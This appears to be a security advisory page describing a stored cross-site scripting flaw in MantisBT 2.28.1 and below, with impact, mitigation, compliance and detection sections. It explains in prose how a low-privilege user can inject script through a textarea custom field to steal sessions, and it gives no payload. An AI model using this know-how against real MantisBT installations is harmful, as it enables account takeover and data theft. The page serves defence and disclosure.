Executive Summary

Mantis Bug Tracker (MantisBT) versions 2.28.1 and below have a vulnerability due to flawed logic that causes improper escaping of a textarea custom field's contents on the Update Issue page (bug_update_page.php). This flaw allows an attacker to inject HTML and, if Content-Security Policy (CSP) settings permit, execute arbitrary JavaScript when the page is loaded.

To exploit this vulnerability, a textarea-type custom field must be configured for the project, and the attacker must be an authenticated user with bug report permission, which is a low privilege level.

The injected script can lead to session theft, enabling the attacker to take over admin accounts and gain full access to project data.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can lead to session theft and administrative account takeover, which means an attacker can gain full access to project data.

Since the attacker only needs low privilege bug report permission to exploit the issue, it poses a significant risk to the confidentiality and integrity of the data managed by MantisBT.

Any user viewing the bug edit form, including administrators, can be affected by the injected malicious code.

Useful 0 Not Useful 0

Mitigation Strategies

To mitigate this vulnerability immediately, upgrade Mantis Bug Tracker to version 2.28.2 or later where the issue is fixed.

If upgrading is not possible right away, use the default Content-Security Policy (CSP) settings to block script execution, which works as a workaround to prevent exploitation.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability in Mantis Bug Tracker allows an attacker to inject HTML and potentially execute arbitrary JavaScript, leading to session theft and admin account takeover. This can result in unauthorized access to full project data.

Such unauthorized access and potential data exposure could negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and prevention of unauthorized access.

However, the provided information does not explicitly mention the impact on compliance with these standards.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability involves improper escaping of textarea custom field contents in the Update Issue page (bug_update_page.php) of Mantis Bug Tracker versions 2.28.1 and below, allowing stored XSS attacks.

To detect this vulnerability on your system, you can check the version of MantisBT installed and verify if it is 2.28.1 or below, as these versions are vulnerable.

Additionally, you can inspect the bug_update_page.php page for improper escaping of textarea custom fields by attempting to inject HTML or JavaScript payloads into a textarea-type custom field (requires authenticated user with bug report permission) and then viewing the bug edit form to see if the payload executes.

For command-line detection, you can use commands to check the installed version of MantisBT, for example:

• grep -i version /path/to/mantisbt/configuration or version files
• dpkg -l | grep mantisbt (on Debian-based systems if installed via package manager)
• rpm -qa | grep mantisbt (on RPM-based systems)

To detect the vulnerability via web testing, you can use a web proxy or browser developer tools to inject a harmless HTML or JavaScript snippet into a textarea custom field and observe if it is executed when viewing the Update Issue page.

Useful 0 Not Useful 0